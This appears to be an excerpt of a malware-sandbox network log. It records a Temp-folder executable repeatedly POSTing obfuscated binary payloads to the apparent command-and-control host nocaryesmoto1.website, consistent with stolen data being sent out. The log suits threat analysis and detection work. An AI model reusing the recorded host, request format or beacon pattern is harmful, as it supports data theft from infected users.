2024-10-19 17:53:59 UTC	208	OUT	Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 95 00 00 00 bb d2 17 22 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 0e 08 08 08 7f ad 26 4c 08 08 08 08 08 08 08 08 2d 89 29 cc 08 08 08 7f ad 26 4c 08 08 08 08 08 08 08 08 a8 9e 04 04 50 08 08 08 08 08 08 08 52 08 52 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 a8 9e 04 06 08 08 08 08 08 08 08 08 08 08 08 08 0a 08 08 08 a8 9e 02 04 08 08 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: "OQ~9I&L-)&LPRR
2024-10-19 17:54:00 UTC	785	IN	HTTP/1.1 204 No Content Date: Sat, 19 Oct 2024 17:54:00 GMT Connection: close rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSwv0efenoLAcF3NZfFW4ecGtW7CxrKHl0yaj0Tg0SE9mOBZUEqWzZ1HOCl2rpTrhtk7ocBqaeTD7onBZ1%2FefcNshPrJxv3UNC21zqZhuGwiISiTyaLiz7y%2Ft3bmFPtZZB8ZIHA7ABA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d52a17ccce0e528-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1253&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1270&delivery_rate=2309409&cwnd=251&unsent_bytes=0&cid=8f9360be413a00ac&ts=399&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49758	188.114.97.3	443	7224	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-19 17:54:02 UTC	428	OUT	POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 Content-Length: 49746 Host: nocaryesmoto1.website
2024-10-19 17:54:02 UTC	15331	OUT	Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 c7 6b 00 00 ba c0 bf 15 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 6d 0c 08 08 7d 89 77 22 08 08 08 08 08 08 08 08 2f 89 29 2d 21 45 8e d8 ec d6 d2 c2 bb 60 8e 7c b0 a2 ee c2 ec ee b0 dc d6 d4 c2 ee b0 8a e8 e8 80 ca e0 ca b0 90 d6 ce ca d0 b0 86 d6 d6 c6 d0 c2 b0 8e d8 ec d6 d2 c2 b0 a2 ee c2 ec 48 80 ca e0 ca 2b 27 47 80 c2 c4 ca e2 d0 e0 bb 70 8e 7c b0 a2 ee c2 ec ee b0 dc d6 d4 c2 ee b0 8a e8 e8 80 ca e0 ca b0 90 d6 ce ca d0 b0 86 d6 d6 c6 d0 c2 b0 8e d8 ec d6 d2 c2 b0 a2 ee c2 ec 48 80 ca e0 ca b0 80 c2 c4 ca e2 d0 e0 bb 60 ce d8 ec d6 d2 da e2 d2 b6 cc ec d6 e6 ee c2 ec ee b0 8e d8 ec d6 d2 c2 b0 e8 ec d6 c4 da d0 c2 ee b0 80 c2 c4 ca e2 d0 e0 b0 90 d6 c6 da d4 48 80 ca e0 ca bb 6a ce d8 Data Ascii: kOQ~9Im}w"/)-!E`\|H+'Gp\|H`Hj
2024-10-19 17:54:02 UTC	15331	OUT	Data Raw: 3b dd 6b 17 64 3b 53 d7 b3 11 e7 e2 55 72 2b ae 65 a4 c6 af 34 ff d8 55 e3 51 39 91 34 7c 40 70 47 fb fa 64 b2 9f de 7d 25 26 df bf 7f db bc d7 49 ce 05 d5 f8 af b1 c1 24 df 1e 1a 3d b6 e6 3d 4b 2b aa 80 f7 18 fd 8d 75 9b f1 2b 8d 53 7c f5 65 da 38 d1 a4 72 6a a6 2a f1 04 d8 c3 f3 04 59 6e 55 a3 3a a7 85 fd 3c 49 95 79 64 a2 ce 7f 2b e6 ee fb ad c5 fd 2f 27 9c f2 e6 0e fb 1d c4 62 ff 14 70 e6 ec 50 2b 72 ee 98 48 8b 40 70 78 36 bc 2f 7e f5 65 bc c6 b0 ae 1e e2 85 62 2b 28 4c 2a 8c 98 fc cd 9a ec 16 fb 40 3b 29 85 17 43 b5 90 f2 40 e2 a0 fd 2d 60 2b d0 44 cf 1b fc d1 03 6b de 8d bb 91 57 47 77 33 74 7c fb 8d 81 37 2b 96 94 39 4b 3a a9 56 b0 df 89 0e 9b d1 db af 8c df 51 b7 1d bf 45 87 32 e6 a7 77 48 f1 8e 6e 60 55 82 04 74 b9 a7 95 2b 9a c1 5a 17 7e 55 a4 Data Ascii: ;kd;SUr+e4UQ94\|@pGd}%&I$==K+u+S\|e8rjYnU:<Iyd+/'bpP+rH@px6/~eb+(L@;)C@-`+DkWGw3t\|7+9K:VQE2wHn`Ut+Z~U
2024-10-19 17:54:02 UTC	15331	OUT	Data Raw: 19 39 53 39 bb bd 6e be 1b 32 42 2e 6e fb 83 90 f4 6a ef 74 b9 6e ce d3 3b 6b e5 91 b8 ff e7 ce da 3d 24 6c 17 c7 f2 59 f2 2e 3a 0c 7e 9c 44 a6 b9 1f 81 4c ff a4 4b 69 42 20 63 01 cd 25 a9 75 42 21 61 01 14 52 4b ce ee 99 70 37 e7 ca 9f 68 c5 9a 73 16 be 05 9a bc 12 ee dc 14 32 bc c5 c9 a9 21 90 ad 6c b6 9a 9f f0 42 52 ef 23 61 91 a6 ad 6c b6 9a 9f f0 42 52 ef 23 61 91 a6 4c 6d d6 7d 69 80 c0 56 de 1a 4e bc 8c fa 9e 38 bb 2c 5c bc 8d ea 93 4a ef 4b ab 05 2a 52 af 1b 69 67 4f c0 2b e5 6c 7c 6c 0d 45 d2 00 50 55 3b 3f 42 9a d8 9e 9f 41 39 d8 23 4c b0 25 41 1d c6 b4 07 66 f7 0e 14 26 60 07 d0 0d 48 e1 18 0d 48 11 18 0d c9 05 1c 19 5a 4b 5d e5 6b ff 87 3f 9b 1c 8c 02 53 9d 44 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 Data Ascii: 9S9n2B.njtn;k=$lY.:~DLKiB c%uB!aRKp7hs2!lBR#alBR#aLm}iVN8,\JK*RigO+l\|lEPU;?BA9#L%Af&`HHZK]k?SD
2024-10-19 17:54:02 UTC	3753	OUT	Data Raw: 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 Data Ascii:
2024-10-19 17:54:02 UTC	790	IN	HTTP/1.1 204 No Content Date: Sat, 19 Oct 2024 17:54:02 GMT Connection: close rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7tNORHWEGK7l5E0ojYZ8HUzNSV5rOaAMdy1Co6HTlh%2BBIBVBN671GBegYa7u9zvID4yuXeN3PK8pObD9gK2Y%2F2w5iDuhLwr7k00q5d46QF8ROXpZQk6KDCoD2aAjEgWLqncxFZK%2BTI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d52a18c2c27e8fd-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1410&sent=23&recv=57&lost=0&retrans=0&sent_bytes=2854&recv_bytes=50942&delivery_rate=2043754&cwnd=251&unsent_bytes=0&cid=ae715ee650f2ae2e&ts=570&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49769	188.114.97.3	443	7224	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-19 17:54:03 UTC	426	OUT	POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 Content-Length: 745 Host: nocaryesmoto1.website
2024-10-19 17:54:03 UTC	745	OUT	Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 95 00 00 00 e3 c7 57 1e 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 0e 08 08 08 cf 87 a6 34 08 08 08 08 08 08 08 08 2d 89 29 cc 08 08 08 cf 87 a6 34 08 08 08 08 08 08 08 08 a8 9e 04 04 50 08 08 08 08 08 08 08 52 08 52 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 a8 9e 04 06 08 08 08 08 08 08 08 08 08 08 08 08 0a 08 08 08 a8 9e 02 04 08 08 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 a7 00 00 00 f1 e3 99 03 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 22 08 08 08 eb cf 3b 0e 08 08 08 08 08 08 08 08 2d 89 2d 23 89 0c 0a 4f 2d 89 08 49 23 89 0a 0a 4f 2d 89 08 49 cc 08 Data Ascii: WOQ~9I4-)4PRROQ~9I";--#O-I#O-I
2024-10-19 17:54:03 UTC	785	IN	HTTP/1.1 204 No Content Date: Sat, 19 Oct 2024 17:54:03 GMT Connection: close rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dW1mW3rahs5J5wTuqnq8igR6B5tMvLWYW4ykpRM6nQ3AxaMhgX6gjJYoqaP53ZZtyb4N7wh2LxuoNL5A6TtCxzj%2BcL%2BuoyGHfeJh7vq2oOBPmDj0uM80HAz4meuzCLcYXkqZNmtaG9M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d52a1940a96474f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1088&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1807&delivery_rate=2696461&cwnd=251&unsent_bytes=0&cid=4e3e915ca95638b1&ts=431&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49775	188.114.97.3	443	7224	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-19 17:54:04 UTC	426	OUT	POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 Content-Length: 212 Host: nocaryesmoto1.website
2024-10-19 17:54:04 UTC	212	OUT	Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 99 00 00 00 c0 67 68 00 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 06 08 08 08 89 c6 d8 08 08 08 08 08 08 08 08 08 2f 89 89 2d 89 2b 08 cc 08 08 08 89 c6 d8 08 08 08 08 08 08 08 08 08 a8 9e 04 04 50 08 08 08 08 08 08 08 52 08 52 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 a8 9e 04 06 08 08 08 08 08 08 08 08 08 08 08 08 0a 08 08 08 a8 9e 02 04 08 08 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: ghOQ~9I/-+PRR
2024-10-19 17:54:04 UTC	795	IN	HTTP/1.1 204 No Content Date: Sat, 19 Oct 2024 17:54:04 GMT Connection: close rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yowBpid8uum5pSCwFOTfEMMjFO7jdtpbWNh3%2BteZlnwag%2B6jLDbyPyL7r0PIx5mTgmJOXnVcv%2Bfms1r6rNKL5yMC%2B%2FKijkoueMWaR%2Ba8ffbSauwN8BG%2FSKvGqxy4puY4iluZ71qBadY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d52a19acd122e21-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1274&delivery_rate=2417362&cwnd=245&unsent_bytes=0&cid=631fd805eb470217&ts=398&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49781	188.114.97.3	443	7224	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-19 17:54:05 UTC	425	OUT	POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 Content-Length: 35 Host: nocaryesmoto1.website
2024-10-19 17:54:05 UTC	35	OUT	Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-10-19 17:54:06 UTC	793	IN	HTTP/1.1 204 No Content Date: Sat, 19 Oct 2024 17:54:06 GMT Connection: close rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K3EGg23mNRYHgIjjyN6xeQ7Q0N8AlU5Rmq4x6y25IYPQXyH%2F1zUMDWoq3%2BLW%2Bi2S7mx3Xo%2FoBpMlwOQQEIEfGAWfj3w7sJun0wV%2FVSxxHBOor9i2sg3%2FDK3n5rMnHYmDDrOKzjVus3Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d52a1a21c136bd7-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1359&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1096&delivery_rate=2326104&cwnd=249&unsent_bytes=0&cid=d6cb6d13a3091d7b&ts=525&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49787	188.114.97.3	443	7224	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-19 17:54:06 UTC	428	OUT	POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 Content-Length: 86120 Host: nocaryesmoto1.website
2024-10-19 17:54:06 UTC	15331	OUT	Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 2d 50 01 00 10 e0 09 04 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 5d 10 08 08 28 c9 1a 00 08 08 08 08 08 08 08 08 3f 89 45 7a 60 6c 6c 60 66 43 dc d6 d4 c2 ee 2f 1c 08 93 9c c2 2b 2d 93 02 08 93 00 08 97 08 08 08 0a f7 e1 08 08 bb 44 9a d4 e0 c2 d0 58 ac 5a 48 8e d6 ec c2 58 a0 92 5a 6c 48 8e a8 a2 48 64 64 68 68 48 88 48 6c 54 60 68 48 86 98 fc 2b 77 92 da ce ec d6 ee d6 c4 e0 48 8c ca ee da ce 48 80 da ee e8 d0 ca fa 48 8a c0 ca e8 e0 c2 ec 89 8f b1 08 85 49 45 ae fa ee e0 c2 d2 59 ac c2 c6 da ee e0 ec fa 59 ee d2 ee ee 54 c2 f8 c2 5b ce ee ec ee ee 54 c2 f8 c2 5f e6 da d4 da d4 da e0 54 c2 f8 c2 5b ce ee ec ee ee 54 c2 f8 c2 51 e6 da d4 d0 d6 c6 d6 d4 54 c2 f8 c2 51 ee c2 ec e4 da ce c2 ee Data Ascii: -POQ~9I](?Ez`ll`fC/+-DXZHXZlHHddhhHHlT`hH+wHHHIEYYT[T_T[TQTQ
2024-10-19 17:54:06 UTC	15331	OUT	Data Raw: 1d dc af 47 12 2b c6 93 3c fa ab 46 b4 7d 2d 76 01 ae 45 d2 a9 43 af 85 0c 26 75 45 e9 5b b1 2d 27 a6 5a a4 b1 26 fc bc 71 59 42 fd 33 04 b0 a6 69 5d 50 3a 39 14 a1 fd b6 23 55 a7 1a 97 42 5b f4 50 c2 d7 99 ad 9d c8 32 7d e8 67 cd cd 8b c7 21 1a 84 05 ca 5f 1e 03 a3 1b a6 10 d4 c4 57 be 70 5d d8 6a f5 a8 9a 26 33 c5 b7 3b 1e 22 2b d2 80 5b b1 f8 cc c7 96 57 e1 62 05 d6 61 c6 db a6 b8 c4 fd 09 b5 3a 3b d1 19 a7 57 4a 4e 4e 3b 2a 6d 1d 27 3e 30 ed 28 56 ec d7 50 15 75 e6 98 82 48 5a 79 53 39 90 54 30 f9 36 c0 15 62 0c a9 03 9b 09 b9 28 28 60 0b 2b 39 10 8d 0e 86 e8 ce 20 83 4a e1 5a 18 da 81 98 c4 0a eb 4e f0 db e5 7e 0f 0f 9f 00 4e 5c 60 eb 53 c9 2e 51 15 50 9e 5b 54 4d 30 73 62 21 e8 ab bc 05 b4 b0 39 7b 3e 9e 34 ee d1 de 4b 32 cc f2 62 7e 17 99 6f 53 3b Data Ascii: G+<F}-vEC&uE[-'Z&qYB3i]P:9#UB[P2}g!_Wp]j&3;"+[Wba:;WJNN;*m'>0(VPuHZyS9T06b((`+9 JZN~N\`S.QP[TM0sb!9{>4K2b~oS;
2024-10-19 17:54:06 UTC	15331	OUT	Data Raw: 86 3f ad e3 e6 66 98 92 f4 fa e6 b6 c3 45 dd 54 66 9d 13 8b 26 5a 40 60 c4 cc 68 22 6f 49 2d 2f 3c 36 df 7e 6b 2b 8f d7 3e b0 27 99 ed dc 4e 37 27 4d 2a b9 ce 9d ad 37 6a a0 54 da 14 87 06 19 0f a8 79 5a 92 d3 e9 6f 36 d4 fe 78 7a e7 be c6 30 f5 30 07 e4 f6 95 02 51 23 52 e8 47 63 80 27 81 b5 f8 60 0a ef 33 46 ec b6 41 73 cb 51 78 65 24 eb 92 1d 57 be 91 bf 61 85 ed 4d 55 70 57 1d a1 6a b4 93 e9 ad 74 cf 8d 53 10 96 bb 27 27 fc e7 d5 41 52 90 a2 a4 37 fc e1 cb be 3d 78 af bb 07 cb cc 5f c2 06 12 94 7a 1d 1f bb e2 ab f3 b3 82 b4 6f e6 fd 1c f4 c2 15 e1 97 5b 82 23 98 f2 63 33 3d 29 ed 73 f9 ad 35 c3 0b 69 d7 7b 1b 50 a4 1f 2d b5 3a da 73 73 7c 8e 57 8e 95 f1 e9 6f 26 b5 48 54 c6 9b 75 38 d9 b9 8f 75 41 a0 fb 52 00 17 61 2c 86 be d6 81 50 3f 73 d6 6c ca 98 Data Ascii: ?fETf&Z@`h"oI-/<6~k+>'N7'M*7jTyZo6xz00Q#RGc'`3FAsQxe$WaMUpWjtS''AR7=x_zo[#c3=)s5i{P-:ss\|Wo&HTu8uARa,P?sl
2024-10-19 17:54:06 UTC	15331	OUT	Data Raw: ff 04 24 97 49 ff d6 9f f1 58 31 f1 2d 14 fe 6c 6e 82 67 24 f1 29 8f 01 8d a0 b8 6f 79 ae ec 9b 43 d8 c9 c9 a1 96 f3 6b 7c 24 7f 8f 1d df 3e 0d 30 2e 1f 26 56 b5 f0 76 f8 23 dd ed c4 5c 50 f3 aa 0f ed 11 fd ce 12 26 72 a6 aa 4f a1 15 8b 85 03 be ff cd 42 e5 2c 70 bd fb 71 10 d8 09 0e 38 60 d8 64 cd ac 63 9d 81 10 f4 91 44 bc f7 60 45 8f b1 5d d3 b3 21 64 28 7a 85 6a a0 d7 82 03 9e ed 12 15 9d 5f 58 ef bd 5b b0 fd f3 48 39 04 39 40 63 b0 ad 73 60 10 3b 60 e5 70 2f e0 06 d5 8f 3b ac 81 3c 74 5b 81 7c 2a a7 40 c2 26 a6 67 fa 19 92 72 9e 6a e5 56 76 81 b5 c1 33 93 d5 6a 61 35 b2 4e c7 51 59 67 7b f9 35 19 3f 3d 39 05 ab 08 46 db 57 6f ea 65 ae 2a 4b b4 d2 31 87 d4 4d 23 9c 04 e2 f3 f2 ee 97 35 13 ad 2f 05 8b 42 e4 ba ba d5 1e a0 58 45 37 74 e8 1a b6 fa ec c5 Data Ascii: $IX1-lng$)oyCk\|$>0.&Vv#\P&rOB,pq8`dcD`E]!d(zj_X[H99@cs`;`p/;<t[\|@&grjVv3ja5NQYg{5?=9FWoeK1M#5/BXE7t
2024-10-19 17:54:06 UTC	15331	OUT	Data Raw: 18 1a 8e 7e 30 db 3f 1b 9a eb f7 8f 83 c9 38 3d 10 83 6f 8a a1 58 b3 f6 a0 d5 7c 86 45 b4 ef 76 cd 42 4e 6a 90 b7 bb 2b 22 90 10 cb b4 4a 44 82 3d 5a 88 48 73 c4 e1 98 8e 0e 60 88 4c 2e 8e 79 cd f7 59 e4 c8 10 b0 78 be 21 7a 88 9d 82 3b 5a 09 9b 40 d9 46 99 2b 0d 5a 3a c1 28 fd 30 15 ef 0a c7 31 7a 1f 8e f3 ab 3f 09 3e a3 01 64 ad 0e e8 6d 1c c8 ed e8 ba bd 88 a6 e7 0e a4 99 07 8e 28 dd 11 7f 63 23 c8 9d 0a 77 0c ec ba 6f d1 9a 97 61 c9 ee 77 92 a9 2e 8d ec 5c 54 0a bc 40 88 9c 9e d5 dd 35 14 71 c5 c2 c4 02 b4 26 9b 9a e4 30 9a 9e 03 70 12 1b 16 41 48 12 a9 71 c2 56 1b 1a a8 64 e8 7f 78 ef 1f d9 56 1a e9 a0 01 aa 27 bd 1b a1 5e d9 e4 ea 63 d9 56 af 5b d9 31 54 62 14 cc 70 14 08 2e af 11 30 58 e7 e8 28 64 18 81 b8 ad 3b ba 31 3a 06 74 ac 0d 0c 7d 04 39 45 Data Ascii: ~0?8=oX\|EvBNj+"JD=ZHs`L.yYx!z;Z@F+Z:(01z?>dm(c#woaw.\T@5q&0pAHqVdxV'^cV[1Tbp.0X(d;1:t}9E
2024-10-19 17:54:06 UTC	9465	OUT	Data Raw: a1 17 57 aa 4a 52 d0 34 37 3a fd cf 5a 46 b4 e1 fd b6 58 e0 2f 13 af b0 a7 7a ca e8 c4 75 90 89 5c cd 68 94 26 1f bb 22 64 47 25 78 50 42 27 11 e5 d4 54 d7 38 76 7d 80 0e e0 94 af 09 96 f5 b9 33 a0 53 6b 9e 5e 0e 07 11 64 60 09 d4 dd 18 67 a8 39 79 60 fa 9d 3c 44 ef 13 d1 9f f9 b8 5a 55 c0 74 c1 f8 15 bf 54 14 17 27 87 f6 ab a3 5f b7 14 cf 6e 9b ed 7f cf 6a 29 1d f3 75 ca b4 ba e4 e9 41 5c 0b de c9 cc e4 d5 67 2f 67 8a 8c 00 ef f1 16 92 e6 03 23 30 85 e2 9d 14 ad 46 45 66 44 8e 7e 0e 71 0e eb 1e 81 f9 88 ca da 5f 27 d3 53 19 0a a4 68 6b c9 bf b6 3b ef 24 18 e2 16 47 fe 7c cb 99 c6 2d 36 90 c8 b0 05 1a f5 74 cd 99 82 35 0d 91 a9 08 6a 7d a7 46 07 94 c7 98 2a 88 b9 48 b1 35 07 36 9a 00 f6 8c 02 f7 7a 55 17 89 ae c4 d8 0c 72 94 26 e5 c6 67 c9 86 09 1a 67 f7 Data Ascii: WJR47:ZFX/zu\h&"dG%xPB'T8v}3Sk^d`g9y`<DZUtT'_nj)uA\g/g#0FEfD~q_'Shk;$G\|-6t5j}F*H56zUr&gg
2024-10-19 17:54:07 UTC	788	IN	HTTP/1.1 204 No Content Date: Sat, 19 Oct 2024 17:54:07 GMT Connection: close rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmfUO3U4FMaOcnrfErnfdsxPBRGDtrJC1YcFuxG2j1mjgvyBIjeNdZXGmAL4WLu%2FR0wKGSIh3EplnddFRwJkQzbBHj1q3Wvg91eCxXuqPltqjGNpW51M3CE2Ikr3lRCUm0FJDHPVMko%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d52a1aa0c4f4862-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1083&sent=36&recv=96&lost=0&retrans=0&sent_bytes=2853&recv_bytes=87426&delivery_rate=2419381&cwnd=251&unsent_bytes=0&cid=ae495c05b44e1a95&ts=842&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49798	188.114.97.3	443	7224	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Timestamp	Bytes transferred	Direction	Data
